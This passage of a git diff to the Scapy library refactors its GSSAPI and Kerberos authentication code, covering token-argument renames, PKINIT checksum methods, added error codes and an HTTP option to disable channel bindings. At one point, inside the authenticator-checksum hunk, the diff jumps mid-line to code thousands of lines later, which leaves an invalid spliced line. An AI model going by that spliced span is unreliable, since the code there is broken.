self.pktchoices: imp, exp = self.pktchoices[hash(type(x))] s = BER_tagging_enc(s, @@ -852,11 +868,11 @@ def i2m(self, s = x elif isinstance(x, ASN1_Object): if x.val: - s = raw(x.val) + s = bytes(x.val) else: s = b"" else: - s = raw(x) + s = bytes(x) if not hasattr(x, "ASN1_root"): # A normal Packet (!= ASN1) return s @@ -897,7 +913,7 @@ def __init__(self, self.cls = cls super(ASN1F_BIT_STRING_ENCAPS, self).__init__( # type: ignore name, - default and raw(default), + default and bytes(default), context=context, implicit_tag=implicit_tag, explicit_tag=explicit_tag diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 28dfa6f97a0..7174e59993b 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -451,6 +451,14 @@ class RPC_C_AUTHN_LEVEL(IntEnum): DCE_C_AUTHN_LEVEL = RPC_C_AUTHN_LEVEL # C706 name +class RPC_C_IMP_LEVEL(IntEnum): + DEFAULT = 0x0 + ANONYMOUS = 0x1 + IDENTIFY = 0x2 + IMPERSONATE = 0x3 + DELEGATE = 0x4 + + # C706 sect 13.2.6.1 @@ -2766,9 +2774,9 @@ def __init__(self, *args, **kwargs): self.ssp = kwargs.pop("ssp", None) self.sspcontext = kwargs.pop("sspcontext", None) self.auth_level = kwargs.pop("auth_level", None) - self.auth_context_id = kwargs.pop("auth_context_id", 0) self.sent_cont_ids = [] self.cont_id = 0 # Currently selected context + self.auth_context_id = 0 # Currently selected authentication context self.map_callid_opnum = {} self.frags = collections.defaultdict(lambda: b"") self.sniffsspcontexts = {} # Unfinished contexts for passive @@ -3283,7 +3291,6 @@ def __init__(self, *args, **kwargs): self.session = DceRpcSession( ssp=kwargs.pop("ssp", None), auth_level=kwargs.pop("auth_level", None), - auth_context_id=kwargs.pop("auth_context_id", None), support_header_signing=kwargs.pop("support_header_signing", True), ) super(DceRpcSocket, self).__init__(*args, **kwargs) diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 547e09a4734..d14f2360f43 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -34,7 +34,7 @@ ASN1_Class_UNIVERSAL, ASN1_Codecs, ) -from scapy.asn1.ber import BERcodec_SEQUENCE +from scapy.asn1.ber import BERcodec_SEQUENCE, BER_id_dec from scapy.asn1.mib import conf # loads conf.mib from scapy.asn1fields import ( ASN1F_OID, @@ -104,19 +104,25 @@ class GSSAPI_BLOB(ASN1_Packet): @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt and len(_pkt) >= 1: - if ord(_pkt[:1]) & 0xA0 >= 0xA0: + if _pkt[0] & 0xA0 >= 0xA0: from scapy.layers.spnego import SPNEGO_negToken # XXX: sometimes the token is raw, we should look from # the session what to use here. For now: hardcode SPNEGO # (THIS IS A VERY STRONG ASSUMPTION) return SPNEGO_negToken - if _pkt[:7] == b"NTLMSSP": + elif _pkt[:7] == b"NTLMSSP": from scapy.layers.ntlm import NTLM_Header # XXX: if no mechTypes are provided during SPNEGO exchange, # Windows falls back to a plain NTLM_Header. return NTLM_Header.dispatch_hook(_pkt=_pkt, *args, **kargs) + elif BER_id_dec(_pkt)[0] & 0x7F > 0x60: + from scapy.layers.kerberos import Kerberos + + # XXX: Heuristic to detect raw Kerberos packets, when Windows + # fallsback or when the parent data hasn't got any mechtype specified. + return Kerberos return cls @@ -454,7 +460,7 @@ class STATE(IntEnum): def GSS_Init_sec_context( self, Context: CONTEXT, - token=None, + input_token=None, target_name: Optional[str] = None, req_flags: Optional[GSS_C_FLAGS] = None, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, @@ -468,7 +474,7 @@ def GSS_Init_sec_context( def GSS_Accept_sec_context( self, Context: CONTEXT, - token=None, + input_token=None, req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): @@ -477,10 +483,21 @@ def GSS_Accept_sec_context( """ raise NotImplementedError + @abc.abstractmethod + def GSS_Inquire_names_for_mech(self) -> List[str]: + """ + Get the available OIDs for this mech, in order of preference. + """ + raise NotImplementedError + # Passive @abc.abstractmethod - def GSS_Passive(self, Context: CONTEXT, token=None): + def GSS_Passive( + self, + Context: CONTEXT, + input_token=None, + ): """ GSS_Passive: client/server call for the SSP in passive mode """ @@ -591,6 +608,9 @@ def GSS_GetMIC( message: bytes, qop_req: int = GSS_C_QOP_DEFAULT, ): + """ + See GSS_GetMICEx + """ return self.GSS_GetMICEx( Context, [ @@ -609,7 +629,10 @@ def GSS_VerifyMIC( Context: CONTEXT, message: bytes, signature, - ): + ) -> None: + """ + See GSS_VerifyMICEx + """ self.GSS_VerifyMICEx( Context, [ @@ -630,6 +653,9 @@ def GSS_Wrap( conf_req_flag: bool, qop_req: int = GSS_C_QOP_DEFAULT, ): + """ + See GSS_WrapEx + """ _msgs, signature = self.GSS_WrapEx( Context, [ @@ -647,7 +673,14 @@ def GSS_Wrap( # sect 2.3.4 - def GSS_Unwrap(self, Context: CONTEXT, signature): + def GSS_Unwrap( + self, + Context: CONTEXT, + signature, + ): + """ + See GSS_UnwrapEx + """ data = b"" if signature.payload: # signature has a payload that is the data. Let's get that payload @@ -679,19 +712,19 @@ def NegTokenInit2(self): """ return None, None - def canMechListMIC(self, Context: CONTEXT): + def SupportsMechListMIC(self): """ - Returns whether or not mechListMIC can be computed + Returns whether mechListMIC is supported or not """ - return False + return True - def getMechListMIC(self, Context, input): + def GetMechListMIC(self, Context, input): """ Compute mechListMIC """ - return bytes(self.GSS_GetMIC(Context, input)) + return self.GSS_GetMIC(Context, input) - def verifyMechListMIC(self, Context, otherMIC, input): + def VerifyMechListMIC(self, Context, otherMIC, input): """ Verify mechListMIC """ diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 016337738fc..26fc3727eb0 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -763,6 +763,7 @@ class HTTP_Client(object): :param ssl: whether to use HTTPS or not :param ssp: the SSP object to use for binding :param no_check_certificate: with SSL, do not check the certificate + :param no_chan_bindings: force disable sending the channel bindings """ def __init__( @@ -772,6 +773,7 @@ def __init__( sslcontext=None, ssp=None, no_check_certificate=False, + no_chan_bindings=False, ): self.sock = None self._sockinfo = None @@ -781,6 +783,7 @@ def __init__( self.ssp = ssp self.sspcontext = None self.no_check_certificate = no_check_certificate + self.no_chan_bindings = no_chan_bindings self.chan_bindings = GSS_C_NO_CHANNEL_BINDINGS def _connect_or_reuse(self, host, port=None, tls=False, timeout=5): @@ -823,7 +826,7 @@ def _connect_or_reuse(self, host, port=None, tls=False, timeout=5): else: context = self.sslcontext sock = context.wrap_socket(sock, server_hostname=host) - if self.ssp: + if self.ssp and not self.no_chan_bindings: # Compute the channel binding token (CBT) self.chan_bindings = GssChannelBindings.fromssl( ChannelBindingType.TLS_SERVER_END_POINT, @@ -941,7 +944,7 @@ def request( # SPNEGO / Kerberos / NTLM self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, - ssp_blob, + input_token=ssp_blob, target_name="http/" + host, req_flags=0, chan_bindings=self.chan_bindings, diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index c8a3320d6e7..a3125382ed5 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -63,11 +63,12 @@ ASN1_BIT_STRING, ASN1_BOOLEAN, ASN1_Class, + ASN1_Codecs, ASN1_GENERAL_STRING, ASN1_GENERALIZED_TIME, ASN1_INTEGER, + ASN1_OID, ASN1_STRING, - ASN1_Codecs, ) from scapy.asn1fields import ( ASN1F_BIT_STRING_ENCAPS, @@ -135,6 +136,7 @@ GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, GSS_S_DEFECTIVE_TOKEN, + GSS_S_DEFECTIVE_CREDENTIAL, GSS_S_FAILURE, GSS_S_FLAGS, GssChannelBindings, @@ -145,7 +147,20 @@ from scapy.layers.inet import TCP, UDP from scapy.layers.smb import _NV_VERSION from scapy.layers.smb2 import STATUS_ERREF -from scapy.layers.tls.cert import Cert, PrivKey +from scapy.layers.tls.cert import ( + Cert, + CertList, + CertTree, + CMS_Engine, + PrivKey, +) +from scapy.layers.tls.crypto.hash import ( + Hash_SHA, + Hash_SHA256, + Hash_SHA384, + Hash_SHA512, +) +from scapy.layers.tls.crypto.groups import _ffdh_groups from scapy.layers.x509 import ( _CMS_ENCAPSULATED, CMS_ContentInfo, @@ -154,17 +169,37 @@ X509_AlgorithmIdentifier, X509_DirectoryName, X509_SubjectPublicKeyInfo, + DomainParameters, ) # Redirect exports from RFC3961 try: from scapy.libs.rfc3961 import * # noqa: F401,F403 + from scapy.libs.rfc3961 import ( + _rfc1964pad, + ChecksumType, + Cipher, + decrepit_algorithms, + EncryptionType, + Hmac_MD5, + Key, + KRB_FX_CF2, + octetstring2key, + ) except ImportError: pass + +# Crypto imports +if conf.crypto_valid: + from cryptography.hazmat.primitives.serialization import pkcs12 + from cryptography.hazmat.primitives.asymmetric import dh + # Typing imports from typing import ( + List, Optional, + Union, ) @@ -356,6 +391,9 @@ def get_usage(self): elif isinstance(self.underlayer, KRB_AS_REP): # AS-REP encrypted part return 3, EncASRepPart + elif isinstance(self.underlayer, KRB_KDC_REQ_BODY): + # KDC-REQ enc-authorization-data + return 4, AuthorizationData elif isinstance(self.underlayer, KRB_AP_REQ) and isinstance( self.underlayer.underlayer, PADATA ): @@ -450,8 +488,6 @@ class EncryptionKey(ASN1_Packet): ) def toKey(self): - from scapy.libs.rfc3961 import Key - return Key( etype=self.keytype.val, key=self.keyvalue.val, @@ -519,7 +555,7 @@ def get_usage(self): def verify(self, key, text, key_usage_number=None): """ - Decrypt and return the data contained in cipher. + Verify a signature of text using a key. :param key: the key to use to check the checksum :param text: the bytes to verify @@ -532,7 +568,7 @@ def verify(self, key, text, key_usage_number=None): def make(self, key, text, key_usage_number=None, cksumtype=None): """ - Encrypt text and set it into cipher. + Make a signature. :param key: the key to use to make the checksum :param text: the bytes to make a checksum of @@ -950,9 +986,10 @@ class KERB_AD_RESTRICTION_ENTRY(ASN1_Packet): class KERB_AUTH_DATA_AP_OPTIONS(Packet): name = "KERB-AUTH-DATA-AP-OPTIONS" fields_desc = [ - LEIntEnumField( + FlagsField( "apOptions", 0x4000, + -32, { 0x4000: "KERB_AP_OPTIONS_CBT", 0x8000: "KERB_AP_OPTIONS_UNVERIFIED_TARGET_NAME", @@ -1248,7 +1285,7 @@ class PA_PK_AS_REQ(ASN1_Packet): ASN1F_optional( ASN1F_SEQUENCE_OF( "trustedCertifiers", - [ExternalPrincipalIdentifier()], + None, ExternalPrincipalIdentifier, explicit_tag=0xA1, ), @@ -1277,11 +1314,59 @@ class PAChecksum2(ASN1_Packet): ), ) + def verify(self, text): + """ + Verify a checksum of text. + + :param text: the bytes to verify + """ + # [MS-PKCA] 2.2.3 - PAChecksum2 + + # Only some OIDs are supported. Dumb but readable code. + oid = self.algorithmIdentifier.algorithm.val + if oid == "1.3.14.3.2.26": + hashcls = Hash_SHA + elif oid == "2.16.840.1.101.3.4.2.1": + hashcls = Hash_SHA256 + elif oid == "2.16.840.1.101.3.4.2.2": + hashcls = Hash_SHA384 + elif oid == "2.16.840.1.101.3.4.2.3": + hashcls = Hash_SHA512 + else: + raise ValueError("Bad PAChecksum2 checksum !") + + if hashcls().digest(text) != self.checksum.val: + raise ValueError("Bad PAChecksum2 checksum !") + + def make(self, text, h="sha256"): + """ + Make a checksum. + + :param text: the bytes to make a checksum of + """ + # Only some OIDs are supported. Dumb but readable code. + if h == "sha1": + hashcls = Hash_SHA + self.algorithmIdentifier.algorithm = ASN1_OID("1.3.14.3.2.26") + elif h == "sha256": + hashcls = Hash_SHA256 + self.algorithmIdentifier.algorithm = ASN1_OID("2.16.840.1.101.3.4.2.1") + elif h == "sha384": + hashcls = Hash_SHA384 + self.algorithmIdentifier.algorithm = ASN1_OID("2.16.840.1.101.3.4.2.2") + elif h == "sha512": + hashcls = Hash_SHA512 + self.algorithmIdentifier.algorithm = ASN1_OID("2.16.840.1.101.3.4.2.3") + else: + raise ValueError("Bad PAChecksum2 checksum !") + + self.checksum = ASN1_STRING(hashcls().digest(text)) + # still RFC 4556 sect 3.2.1 -class PKAuthenticator(ASN1_Packet): +class KRB_PKAuthenticator(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( Microseconds("cusec", 0, explicit_tag=0xA0), @@ -1292,14 +1377,34 @@ class PKAuthenticator(ASN1_Packet): ), # RFC8070 extension ASN1F_optional( - ASN1F_STRING("freshnessToken", "", explicit_tag=0xA4), + ASN1F_STRING("freshnessToken", None, explicit_tag=0xA4), ), # [MS-PKCA] sect 2.2.3 ASN1F_optional( - ASN1F_PACKET("paChecksum2", None, PAChecksum2, explicit_tag=0xA5), + ASN1F_PACKET("paChecksum2", PAChecksum2(), PAChecksum2, explicit_tag=0xA5), ), ) + def make_checksum(self, text, h="sha256"): + """ + Populate paChecksum and paChecksum2 + """ + # paChecksum (always sha-1) + self.paChecksum = ASN1_STRING(Hash_SHA().digest(text)) + + # paChecksum2 + self.paChecksum2 = PAChecksum2() + self.paChecksum2.make(text, h=h) + + def verify_checksum(self, text): + """ + Verify paChecksum and paChecksum2 + """ + if self.paChecksum.val != Hash_SHA().digest(text): + raise ValueError("Bad paChecksum checksum !") + + self.paChecksum2.verify(text) + # RFC8636 sect 6 @@ -1314,13 +1419,13 @@ class KDFAlgorithmId(ASN1_Packet): # still RFC 4556 sect 3.2.1 -class AuthPack(ASN1_Packet): +class KRB_AuthPack(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( ASN1F_PACKET( "pkAuthenticator", - PKAuthenticator(), - PKAuthenticator, + KRB_PKAuthenticator(), + KRB_PKAuthenticator, explicit_tag=0xA0, ), ASN1F_optional( @@ -1334,13 +1439,13 @@ class AuthPack(ASN1_Packet): ASN1F_optional( ASN1F_SEQUENCE_OF( "supportedCMSTypes", - [], + None, X509_AlgorithmIdentifier, explicit_tag=0xA2, ), ), ASN1F_optional( - ASN1F_STRING("clientDCNonce", None, explicit_tag=0xA3), + ASN1F_STRING("clientDHNonce", None, explicit_tag=0xA3), ), # RFC8636 extension ASN1F_optional( @@ -1349,7 +1454,7 @@ class AuthPack(ASN1_Packet): ) -_CMS_ENCAPSULATED["1.3.6.1.5.2.3.1"] = AuthPack +_CMS_ENCAPSULATED["1.3.6.1.5.2.3.1"] = KRB_AuthPack # sect 3.2.3 @@ -1709,6 +1814,12 @@ class KRB_AS_REP(ASN1_Packet): implicit_tag=ASN1_Class_KRB.AS_REP, ) + def getUPN(self): + return "%s@%s" % ( + self.cname.toString(), + self.crealm.val.decode(), + ) + class KRB_TGS_REP(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -2013,15 +2124,17 @@ def m2i(self, pkt, s): # 25: KDC_ERR_PREAUTH_REQUIRED # 36: KRB_AP_ERR_BADMATCH return MethodData(val[0].val, _underlayer=pkt), val[1] - elif pkt.errorCode.val in [6, 7, 12, 13, 18, 29, 41, 60]: + elif pkt.errorCode.val in [6, 7, 12, 13, 18, 29, 32, 41, 60, 62]: # 6: KDC_ERR_C_PRINCIPAL_UNKNOWN # 7: KDC_ERR_S_PRINCIPAL_UNKNOWN # 12: KDC_ERR_POLICY # 13: KDC_ERR_BADOPTION # 18: KDC_ERR_CLIENT_REVOKED # 29: KDC_ERR_SVC_UNAVAILABLE + # 32: KRB_AP_ERR_TKT_EXPIRED # 41: KRB_AP_ERR_MODIFIED # 60: KRB_ERR_GENERIC + # 62: KERB_ERR_TYPE_EXTENDED try: return KERB_ERROR_DATA(val[0].val, _underlayer=pkt), val[1] except BER_Decoding_Error: @@ -2112,9 +2225,10 @@ class KRB_ERROR(ASN1_Packet): 52: "KRB_ERR_RESPONSE_TOO_BIG", 60: "KRB_ERR_GENERIC", 61: "KRB_ERR_FIELD_TOOLONG", - 62: "KDC_ERROR_CLIENT_NOT_TRUSTED", - 63: "KDC_ERROR_KDC_NOT_TRUSTED", - 64: "KDC_ERROR_INVALID_SIG", + # RFC4556 + 62: "KDC_ERR_CLIENT_NOT_TRUSTED", + 63: "KDC_ERR_KDC_NOT_TRUSTED", + 64: "KDC_ERR_INVALID_SIG", 65: "KDC_ERR_KEY_TOO_WEAK", 66: "KDC_ERR_CERTIFICATE_MISMATCH", 67: "KRB_AP_ERR_NO_TGT", @@ -2127,6 +2241,11 @@ class KRB_ERROR(ASN1_Packet): 74: "KDC_ERR_REVOCATION_STATUS_UNAVAILABLE", 75: "KDC_ERR_CLIENT_NAME_MISMATCH", 76: "KDC_ERR_KDC_NAME_MISMATCH", + 77: "KDC_ERR_INCONSISTENT_KEY_PURPOSE", + 78: "KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED", + 79: "KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED", + 80: "KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED", + 81: "KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED", # draft-ietf-kitten-iakerb 85: "KRB_AP_ERR_IAKERB_KDC_NOT_FOUND", 86: "KRB_AP_ERR_IAKERB_KDC_NO_RESPONSE", @@ -2313,11 +2432,11 @@ class KRB_AuthenticatorChecksum(Packet): }, ), ConditionalField( - LEShortField("DlgOpt", 0), + LEShortField("DlgOpt", 1), lambda pkt: pkt.Flags.GSS_C_DELEG_FLAG, ), ConditionalField( - FieldLenField("Dlgth", None, length_of="Deleg"), + FieldLenField("Dlgth", None, length_of="Deleg", fmt="I", Context.SendSeqNum) tok = KRB_InnerToken( @@ -4683,13 +5008,6 @@ def MakeToSign(Confounder, DecText): msgs[0].data = Data return msgs elif Context.KrbSessionKey.etype in [23, 24]: # RC4 - from scapy.libs.rfc3961 import ( - Cipher, - Hmac_MD5, - _rfc1964pad, - decrepit_algorithms, - ) - # Drop wrapping tok = signature.innerToken @@ -4747,7 +5065,7 @@ def MakeToSign(Confounder, DecText): def GSS_Init_sec_context( self, Context: CONTEXT, - token=None, + input_token=None, target_name: Optional[str] = None, req_flags: Optional[GSS_C_FLAGS] = None, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, @@ -4756,8 +5074,6 @@ def GSS_Init_sec_context( # New context Context = self.CONTEXT(IsAcceptor=False, req_flags=req_flags) - from scapy.libs.rfc3961 import Key - if Context.state == self.STATE.INIT and self.U2U: # U2U - Get TGT Context.state = self.STATE.CLI_SENT_TGTREQ @@ -4776,59 +5092,84 @@ def GSS_Init_sec_context( if Context.state in [self.STATE.INIT, self.STATE.CLI_SENT_TGTREQ]: if not self.UPN: raise ValueError("Missing UPN attribute") + # Do we have a ST? if self.ST is None: # Client sends an AP-req if not self.SPN and not target_name: raise ValueError("Missing SPN/target_name attribute") additional_tickets = [] + if self.U2U: try: # GSSAPI / Kerberos - tgt_rep = token.root.innerToken.root + tgt_rep = input_token.root.innerToken.root except AttributeError: try: # Kerberos - tgt_rep = token.innerToken.root + tgt_rep = input_token.innerToken.root except AttributeError: return Context, None, GSS_S_DEFECTIVE_TOKEN if not isinstance(tgt_rep, KRB_TGT_REP): tgt_rep.show() - raise ValueError("KerberosSSP: Unexpected token !") + raise ValueError("KerberosSSP: Unexpected input_token !") additional_tickets = [tgt_rep.ticket] - if self.TGT is not None: - if not self.KEY: - raise ValueError("Cannot use TGT without the KEY") - # Use TGT - res = krb_tgs_req( - upn=self.UPN, - spn=self.SPN or target_name, - ip=self.DC_IP, - sessionkey=self.KEY, - ticket=self.TGT, - additional_tickets=additional_tickets, - u2u=self.U2U, - debug=self.debug, - ) - else: - # Ask for TGT then ST - res = krb_as_and_tgs( + + if self.TGT is None: + # Get TGT. We were passed a kerberos key + res = krb_as_req( upn=self.UPN, - spn=self.SPN or target_name, ip=self.DC_IP, key=self.KEY, password=self.PASSWORD, - additional_tickets=additional_tickets, - u2u=self.U2U, debug=self.debug, + verbose=bool(self.debug), ) + if res is None: + # Failed to retrieve the ticket + return Context, None, GSS_S_FAILURE + + # Update UPN (could have been canonicalized) + self.UPN = res.upn + + # Store TGT, + self.TGT = res.asrep.ticket + self.TGTSessionKey = res.sessionkey + else: + # We have a TGT and were passed its key + self.TGTSessionKey = self.KEY + + # Get ST + if not self.TGTSessionKey: + raise ValueError("Cannot use TGT without the KEY") + + res = krb_tgs_req( + upn=self.UPN, + spn=self.SPN or target_name, + ip=self.DC_IP, + sessionkey=self.TGTSessionKey, + ticket=self.TGT, + additional_tickets=additional_tickets, + u2u=self.U2U, + debug=self.debug, + verbose=bool(self.debug), + ) if not res: # Failed to retrieve the ticket return Context, None, GSS_S_FAILURE - self.ST, self.KEY = res.tgsrep.ticket, res.sessionkey + + # Store the service ticket and associated key + self.ST, Context.STSessionKey = res.tgsrep.ticket, res.sessionkey elif not self.KEY: raise ValueError("Must provide KEY with ST") - Context.STSessionKey = self.KEY + else: + # We were passed a ST and its key + Context.STSessionKey = self.KEY + + if Context.flags & GSS_C_FLAGS.GSS_C_DELEG_FLAG: + raise ValueError( + "Cannot use GSS_C_DELEG_FLAG when passed a service ticket !" + ) # Save ServerHostname if len(self.ST.sname.nameString) == 2: @@ -4860,25 +5201,47 @@ def GSS_Init_sec_context( # Get the realm of the client _, crealm = _parse_upn(self.UPN) + # Build the RFC4121 authenticator checksum + authenticator_checksum = KRB_AuthenticatorChecksum( + # RFC 4121 sect 4.1.1.2 + # "The Bnd field contains the MD5 hash of channel bindings" + Bnd=( + chan_bindings.digestMD5() + if chan_bindings != GSS_C_NO_CHANNEL_BINDINGS + else (b"\x00" * 16) + ), + Flags=int(Context.flags), + ) + + if Context.flags & GSS_C_FLAGS.GSS_C_DELEG_FLAG: + # Delegate TGT + raise NotImplementedError("GSS_C_DELEG_FLAG is not implemented !") + # authenticator_checksum.Deleg = KRB_CRED( + # tickets=[self.TGT], + # encPart=EncryptedData() + # ) + # authenticator_checksum.encPart.encrypt( + # Context.STSessionKey, + # EncKrbCredPart( + # ticketInfo=KrbCredInfo( + # key=EncryptionKey.fromKey(self.TGTSessionKey), + # prealm=ASN1_GENERAL_STRING(crealm), + # pname=PrincipalName.fromUPN(self.UPN), + # # TODO: rework API to pass starttime... here. + # sreralm=self.TGT.realm, + # sname=self.TGT.sname, + # ) + # ) + # ) + # Build and encrypt the full KRB_Authenticator ap_req.authenticator.encrypt( Context.STSessionKey, KRB_Authenticator( crealm=crealm, cname=PrincipalName.fromUPN(self.UPN), - # RFC 4121 checksum cksum=Checksum( - cksumtype="KRB-AUTHENTICATOR", - checksum=KRB_AuthenticatorChecksum( - # RFC 4121 sect 4.1.1.2 - # "The Bnd field contains the MD5 hash of channel bindings" - Bnd=( - chan_bindings.digestMD5() - if chan_bindings != GSS_C_NO_CHANNEL_BINDINGS - else (b"\x00" * 16) - ), - Flags=int(Context.flags), - ), + cksumtype="KRB-AUTHENTICATOR", checksum=authenticator_checksum ), ctime=ASN1_GENERALIZED_TIME(now_time), cusec=ASN1_INTEGER(0), @@ -4895,7 +5258,9 @@ def GSS_Init_sec_context( adData=KERB_AD_RESTRICTION_ENTRY( restriction=LSAP_TOKEN_INFO_INTEGRITY( MachineID=bytes(RandBin(32)), - PermanentMachineID=bytes(RandBin(32)), # noqa: E501 + PermanentMachineID=bytes( + RandBin(32) + ), ) ), ), @@ -4941,30 +5306,32 @@ def GSS_Init_sec_context( ) elif Context.state == self.STATE.CLI_SENT_APREQ: - if isinstance(token, KRB_AP_REP): + if isinstance(input_token, KRB_AP_REP): # Raw AP_REP was passed - ap_rep = token + ap_rep = input_token else: try: # GSSAPI / Kerberos - ap_rep = token.root.innerToken.root + ap_rep = input_token.root.innerToken.root except AttributeError: try: # Kerberos - ap_rep = token.innerToken.root + ap_rep = input_token.innerToken.root except AttributeError: try: # Raw kerberos DCE-STYLE - ap_rep = token.root + ap_rep = input_token.root except AttributeError: return Context, None, GSS_S_DEFECTIVE_TOKEN if not isinstance(ap_rep, KRB_AP_REP): return Context, None, GSS_S_DEFECTIVE_TOKEN + # Retrieve SessionKey repPart = ap_rep.encPart.decrypt(Context.STSessionKey) if repPart.subkey is not None: Context.SessionKey = repPart.subkey.keyvalue.val Context.KrbSessionKey = repPart.subkey.toKey() + # OK ! Context.state = self.STATE.CLI_RCVD_APREP if Context.flags & GSS_C_FLAGS.GSS_C_DCE_STYLE: @@ -4996,7 +5363,7 @@ def GSS_Init_sec_context( def GSS_Accept_sec_context( self, Context: CONTEXT, - token=None, + input_token=None, req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): @@ -5004,7 +5371,6 @@ def GSS_Accept_sec_context( # New context Context = self.CONTEXT(IsAcceptor=True, req_flags=req_flags) - from scapy.libs.rfc3961 import Key import scapy.layers.msrpce.mspac # noqa: F401 if Context.state == self.STATE.INIT: @@ -5023,21 +5389,21 @@ def GSS_Accept_sec_context( self.TGT, self.KEY = res.asrep.ticket, res.sessionkey # Server receives AP-req, sends AP-rep - if isinstance(token, KRB_AP_REQ): + if isinstance(input_token, KRB_AP_REQ): # Raw AP_REQ was passed - ap_req = token + ap_req = input_token else: try: # GSSAPI/Kerberos - ap_req = token.root.innerToken.root + ap_req = input_token.root.innerToken.root except AttributeError: try: # Kerberos - ap_req = token.innerToken.root + ap_req = input_token.innerToken.root except AttributeError: try: # Raw kerberos - ap_req = token.root + ap_req = input_token.root except AttributeError: return Context, None, GSS_S_DEFECTIVE_TOKEN @@ -5121,7 +5487,7 @@ def GSS_Accept_sec_context( ), ) ) - return Context, err, GSS_S_DEFECTIVE_TOKEN + return Context, err, GSS_S_DEFECTIVE_CREDENTIAL # Store information about the user in the Context if tkt.authorizationData and tkt.authorizationData.seq: @@ -5194,20 +5560,20 @@ def GSS_Accept_sec_context( # [MS-KILE] sect 3.4.5.1 # The server MUST receive the additional AP exchange reply message and # verify that the message is constructed correctly. - if not token: + if not input_token: return Context, None, GSS_S_DEFECTIVE_TOKEN # Server receives AP-req, sends AP-rep - if isinstance(token, KRB_AP_REP): + if isinstance(input_token, KRB_AP_REP): # Raw AP_REP was passed - ap_rep = token + ap_rep = input_token else: try: # GSSAPI/Kerberos - ap_rep = token.root.innerToken.root + ap_rep = input_token.root.innerToken.root except AttributeError: try: # Raw Kerberos - ap_rep = token.root + ap_rep = input_token.root except AttributeError: return Context, None, GSS_S_DEFECTIVE_TOKEN # Decrypt the AP-REP @@ -5223,7 +5589,7 @@ def GSS_Accept_sec_context( def GSS_Passive( self, Context: CONTEXT, - token=None, + input_token=None, req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, ): if Context is None: @@ -5236,25 +5602,31 @@ def GSS_Passive( and req_flags & GSS_C_FLAGS.GSS_C_DCE_STYLE ): Context, _, status = self.GSS_Accept_sec_context( - Context, token, req_flags=req_flags + Context, + input_token=input_token, + req_flags=req_flags, ) if status in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: Context.state = self.STATE.CLI_SENT_APREQ else: Context.state = self.STATE.FAILED - return Context, status elif Context.state == self.STATE.CLI_SENT_APREQ: Context, _, status = self.GSS_Init_sec_context( - Context, token, req_flags=req_flags + Context, + input_token=input_token, + req_flags=req_flags, ) if status == GSS_S_COMPLETE: + if req_flags & GSS_C_FLAGS.GSS_C_DCE_STYLE: + status = GSS_S_CONTINUE_NEEDED Context.state = self.STATE.SRV_SENT_APREP else: Context.state == self.STATE.FAILED - return Context, status + else: + # Unknown state. Don't crash though. + status = GSS_S_FAILURE - # Unknown state. Don't crash though. - return Context, GSS_S_FAILURE + return Context, status def GSS_Passive_set_Direction(self, Context: CONTEXT, IsAcceptor=False): if Context.IsAcceptor is not IsAcceptor: @@ -5287,6 +5659,3 @@ def MaximumSignatureLength(self, Context: CONTEXT): raise NotImplementedError else: return 28 - - def canMechListMIC(self, Context: CONTEXT): - return bool(Context.KrbSessionKey) diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index c09e07e64c1..38651dacd45 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -2070,7 +2070,7 @@ def bind( # 3. Second exchange: Response self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, - GSSAPI_BLOB(val), + input_token=GSSAPI_BLOB(val), target_name="ldap/" + self.host, chan_bindings=self.chan_bindings, ) @@ -2126,7 +2126,7 @@ def bind( break self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, - GSSAPI_BLOB(val), + input_token=GSSAPI_BLOB(val), target_name="ldap/" + self.host, chan_bindings=self.chan_bindings, ) diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index fef1007e562..5933889c2d5 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -22,6 +22,7 @@ NL_AUTH_MESSAGE, NL_AUTH_SIGNATURE, ) +from scapy.layers.kerberos import KerberosSSP, _parse_upn from scapy.layers.gssapi import ( GSS_C_FLAGS, GSS_C_NO_CHANNEL_BINDINGS, @@ -29,8 +30,9 @@ GSS_S_CONTINUE_NEEDED, GSS_S_FAILURE, GSS_S_FLAGS, + SSP, ) -from scapy.layers.ntlm import RC4, RC4K, RC4Init, SSP +from scapy.layers.ntlm import RC4, RC4K, RC4Init, MD4le from scapy.layers.msrpce.rpcclient import ( DCERPC_Client, @@ -40,6 +42,8 @@ from 